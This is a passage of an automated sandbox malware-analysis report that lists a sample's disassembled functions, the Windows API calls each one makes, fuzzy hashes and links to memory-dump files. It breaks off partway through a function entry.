Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 95a711640e5adce9e114efc5c09a09af0b7094d20454417354a74eb342f74c5d
Instruction ID: df1fb664199e04ef451ce96908ad73d7a245e6a47f53f5d68e5d19a662b21122
Opcode Fuzzy Hash: 95a711640e5adce9e114efc5c09a09af0b7094d20454417354a74eb342f74c5d
Instruction Fuzzy Hash: CE928B706187418FD724EF14C490B2AB7E1FF89304F2489ADE98A9B362D775EC45CB92

Function 00B7E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00B7E628

Strings

(, xrefs: 00B7E66E
|, xrefs: 00B7E658

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 16579ccc732d4e1cea62691a3c36647d3da88c4276d651ccf627c3cd1b9a1dbf
Instruction ID: 9068a5fc6322a37c001d179d9f036ba79376922839e87860d14b5d527e2c4684
Opcode Fuzzy Hash: 16579ccc732d4e1cea62691a3c36647d3da88c4276d651ccf627c3cd1b9a1dbf
Instruction Fuzzy Hash: A4323675A007059FD728CF29C48196AB7F1FF48320B15C4AEE9AADB3A1E770E941CB40

Function 00B922EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00B9180A,00000000), ref: 00B923E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00B92418

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: b325c4219a677be41da05fb0ecc54f72c63e44ec934325b3e6fac9192342bf3c
Instruction ID: fa6d54362e0b459c93f6a7915029c105e39f308e49deb55cef0ff49b52f1af36
Opcode Fuzzy Hash: b325c4219a677be41da05fb0ecc54f72c63e44ec934325b3e6fac9192342bf3c
Instruction Fuzzy Hash: 1341C371D04209BFEF209F95DC85EBBB7FCEB40314F1040BAF641A7241EA759E41AA64

Function 00B8B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B8B40B
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00B8B465
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00B8B4B2

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: bb07ac0976f4e5c3ad89057e4ee01c4f86c561a9ac58752fdbe7a88d52f3aca6
Instruction ID: 1de71d1bf968f5f8f428373ef4c80d6da482458c07521aaf48d650a4d4aa5123
Opcode Fuzzy Hash: bb07ac0976f4e5c3ad89057e4ee01c4f86c561a9ac58752fdbe7a88d52f3aca6
Instruction Fuzzy Hash: 74216035A00118EFCB00EFA5E881EEDBBF8FF49310F1480A9E909AB361DB319955CB51

Function 00B787E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00B40DB6: std::exception::exception.LIBCMT ref: 00B40DEC
Part of subcall function 00B40DB6: __CxxThrowException@8.LIBCMT ref: 00B40E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B7882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B78858
GetLastError.KERNEL32 ref: 00B78865

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 4911f9e66ae9610d8756ddf2c76a2313a1f984ae1f744120f2d2e01c6e994f46
Instruction ID: 2a8df40b51eff685d7815100512018b2f9cf8565bf7035b1cd6057471c5a6889
Opcode Fuzzy Hash: 4911f9e66ae9610d8756ddf2c76a2313a1f984ae1f744120f2d2e01c6e994f46
Instruction Fuzzy Hash: B61182B1814205AFD718EFA4DC8AD6BB7F8EB45711B10C56EF45997241EF30BC408B60

Function 00B7874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00B78774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00B7878B
FreeSid.ADVAPI32(?), ref: 00B7879B

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 042ddbd25ab0e1330f5463eb31f1495b99b0cd1b60c675e056e0a3d59fd2d5ec
Instruction ID: 98762e29b5692d13bf00135e6945f0131879210341aca3cac4976ae78eaccb0c
Opcode Fuzzy Hash: 042ddbd25ab0e1330f5463eb31f1495b99b0cd1b60c675e056e0a3d59fd2d5ec
Instruction Fuzzy Hash: 1CF03C75951209BBDB14DFE49C8AABEB7B8EF08201F1044A9A501E2181E6715A048B50

Function 00B8C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00B8C6FB
FindClose.KERNEL32(00000000), ref: 00B8C72B

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: b9dc3a3f306d23a5f73b689f84f1573946c35b93c18984b980de0879365fec10
Instruction ID: 1e7dc92bd5fd935491e7cd314987f1263de373c9f016e6ac6c45d57b8f1064db
Opcode Fuzzy Hash: b9dc3a3f306d23a5f73b689f84f1573946c35b93c18984b980de0879365fec10
Instruction Fuzzy Hash: F01182766006049FDB10EF29D845A6AF7E5EF45360F04855DF8A98B2A0DB30EC01CB91

Function 00B8A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00B99468,?,00BAFB84,?), ref: 00B8A097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00B99468,?,00BAFB84,?), ref: 00B8A0A9

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: b6ac85876982a87efe8f1023d4590bb9b9757e9a2cbfc413ceb1201a80aa5aab
Instruction ID: 43b9c186a9fcaee2d13d99425b759f44eaae89102e1b60f6db7ff4c30e1d4bbb
Opcode Fuzzy Hash: b6ac85876982a87efe8f1023d4590bb9b9757e9a2cbfc413ceb1201a80aa5aab
Instruction Fuzzy Hash: 38F0E23510422DABDB20AFA4CC49FEA73ACFF09362F0041A6F808D3190CA30A900CBA1

Function 00B781CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B78309), ref: 00B781E0
CloseHandle.KERNEL32(?,?,00B78309), ref: 00B781F2

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 0f306f2b710df1138afcb4716bbf9340e2db04df230471c70b521d81943c7bc5
Instruction ID: 8901b70778bbbab39feee8274c6b1093644777a25cc86a2507916fd63bdd77fd
Opcode Fuzzy Hash: 0f306f2b710df1138afcb4716bbf9340e2db04df230471c70b521d81943c7bc5
Instruction Fuzzy Hash: 1DE08631020511AFE7212B61EC09D7377E9EF04310710886DF5A580430CB315CA0DB10

Function 00B4A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00B48D57,?,?,?,00000001), ref: 00B4A15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00B4A163

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4e51e0200c9da27bb520117edfc4801f44793f6cec94f1daa5832a9ce0d719e0
Instruction ID: 24e675dc9d18143006accf2680e79deba094929a34def150d672053150e3ff04
Opcode Fuzzy Hash: 4e51e0200c9da27bb520117edfc4801f44793f6cec94f1daa5832a9ce0d719e0
Instruction Fuzzy Hash: 76B0923105420AABCF002BD1EC5ABEC3FA8EB46AA2F404020F60D86060CFA254508A99

Function 00B4F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bc9162c3bb88aed6f5868fd754f4cc104bca713ce409255bfc06e009d320fd1
Instruction ID: 36f68c7e63048229e8981123c60722fca0e6d6e96541e55d7ca6ec9533804b9e
Opcode Fuzzy Hash: 2bc9162c3bb88aed6f5868fd754f4cc104bca713ce409255bfc06e009d320fd1
Instruction Fuzzy Hash: 4632F421D69F024EDB239634D872335A289AFB73C4F15D737E819B6DA6EF68C5835100

Function 00B5242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79bc8956663abd14e451e7496b7c275735682a1cb7dbf56321c988340a056e46
Instruction ID: eb5dcfb31054e464308c534f40608fd25cef913d1b18b9c2c26c2377f6859ff0
Opcode Fuzzy Hash: 79bc8956663abd14e451e7496b7c275735682a1cb7dbf56321c988340a056e46
Instruction Fuzzy Hash: B5B11120E2AF404ED32396398831336BB9CAFBB2C5F51D71BFC2671E22EB6185834141

Function 00B88889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00B8889B

Part of subcall function 00B4520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00B88F6E,00000000,?,?,?,?,00B8911F,00000000,?), ref: 00B45213
Part of subcall function 00B4520A: __aulldiv.LIBCMT ref: 00B45233

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 6cd87897659ecd53026137359f1c2ce60a6e8ea26acd65bc4be38122aa477b48
Instruction ID: b357cbd6471b0e5dd4d2d49a4ed747ecdb7b0b241d1111a1c6b7e51a54173ccd
Opcode Fuzzy Hash: 6cd87897659ecd53026137359f1c2ce60a6e8ea26acd65bc4be38122aa477b48
Instruction Fuzzy Hash: 1D21AF326256108BC729CF29D881A52B3E1EFA5321B688EACD1F5CF2D0CE74A905CB54

Function 00B84C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00B84C4A

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: a57314a4462274b5b4300c08cdce049a082c1c9eef5085624f534ee181f9af95
Instruction ID: 2f2e49d4eeaf9133e436d674959da44557913c5e9053f69e34ae33e955b1956e
Opcode Fuzzy Hash: a57314a4462274b5b4300c08cdce049a082c1c9eef5085624f534ee181f9af95
Instruction Fuzzy Hash: 42D05EA116920B38EC1C27209E0FF7A11CCE300782FD085C971018A0E1EF805C40DB30

Function 00B787B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00B78389), ref: 00B787D1

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 28cc72e75fb63a23d2dd38b71a3fb32948fa500469d184a8055344505678a562
Instruction ID: 9be9e20bd4fb06cb380b38a7e14204a2c9820236bbfc7a32d34a46c72be05118
Opcode Fuzzy Hash: 28cc72e75fb63a23d2dd38b71a3fb32948fa500469d184a8055344505678a562
Instruction Fuzzy Hash: C5D05E322A050EABEF118EA4DC02EFE3B69EB04B01F408111FE15C60A1C775D835AB60

Function 00B4A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00B4A12A

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f87da940c7a0a0df5f533ad3d2e03bfe0465985bb9936d9bb6457aeef0a36363
Instruction ID: 8e689637ecee26442135a98691345224d53868478a46e348d73cba40b03b17c7
Opcode Fuzzy Hash: f87da940c7a0a0df5f533ad3d2e03bfe0465985bb9936d9bb6457aeef0a36363
Instruction Fuzzy Hash: 3AA0123000010DA78F001B81EC054987F9CD6011907004020F40C410218B3254104584

Function 00B38808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9dc6ddc06d49e409d732afc8baaad578c09ba9f94f5cf675ec9c6be4e31f4a6
Instruction ID: 0a796173c1ff9e273f0705b05fc29e193816ab79c8c829a935acd667f1428ec9
Opcode Fuzzy Hash: d9dc6ddc06d49e409d732afc8baaad578c09ba9f94f5cf675ec9c6be4e31f4a6
Instruction Fuzzy Hash: D022253050470A8BDF388A64C4D4B7CB7E1FB41305F7885EBF56A9B592EBB09D91C682

Function 00B421C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 47e61ce42a29afd07659994dd5ec78e5c114210b3ccc572014c0c18e81df22cd
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 46C163726051930ADF2D473D847413EBAE19EA27B135A07FDE8B2CB1D4EE10CA65F620

Function 00B425FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 8d798ba541b936546f976fb16d15de1cbd92e85918211d62cea60fd5f25577a8
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: FDC1727260519309DF2D473E847413EBBE19EA27B135A07FDE4B2DB1D4EE20CA65B620

Function 00B41978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: eddf46d9f4c23ead8183f1c1f058ef3d898adfef7df5532ed464d8d9ac6f95ea
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: BBC17472A4519309DF2D463DC47413EBAE1DEA27B131A0BFDD4B2CB1C5EE10CAA5A620

Function 00B97806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00B9785B
DeleteObject.GDI32(00000000), ref: 00B9786D
DestroyWindow.USER32 ref: 00B9787B
GetDesktopWindow.USER32 ref: 00B97895
GetWindowRect.USER32(00000000), ref: 00B9789C
